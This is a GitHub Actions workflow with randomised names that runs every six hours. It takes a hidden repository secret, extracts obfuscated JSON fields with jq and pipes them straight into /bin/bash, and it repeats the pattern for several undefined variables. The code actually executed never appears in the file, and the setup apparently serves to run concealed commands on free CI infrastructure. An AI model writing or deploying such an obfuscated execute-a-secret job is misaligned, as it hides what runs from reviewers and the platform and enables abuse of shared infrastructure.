name: shanxiaochen8371

on:
  workflow_dispatch:
  schedule:
    - cron: '28 1/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: shanxiaochen8371
        env:
          gbg54: ${{ secrets.gbg54 }}
        run: |
          echo $gbg54 | jq -r .l4933 | /bin/bash
          echo $tzi2 | jq -r .s30256 | /bin/bash
          echo $ecr132 | jq -r .u4544 | /bin/bash
          echo $co00 | jq -r .ezl46 | /bin/bash
          echo $vinfn3 | jq -r .dioza97904 | /bin/bash
          echo $enru1200 | jq -r .uxzp82 | /bin/bash
          echo $xx65 | jq -r .ri70927 | /bin/bash
          echo $sf4 | jq -r .kcdd90 | /bin/bash
          echo $lqfw19139 | jq -r .wnis1223 | /bin/bash

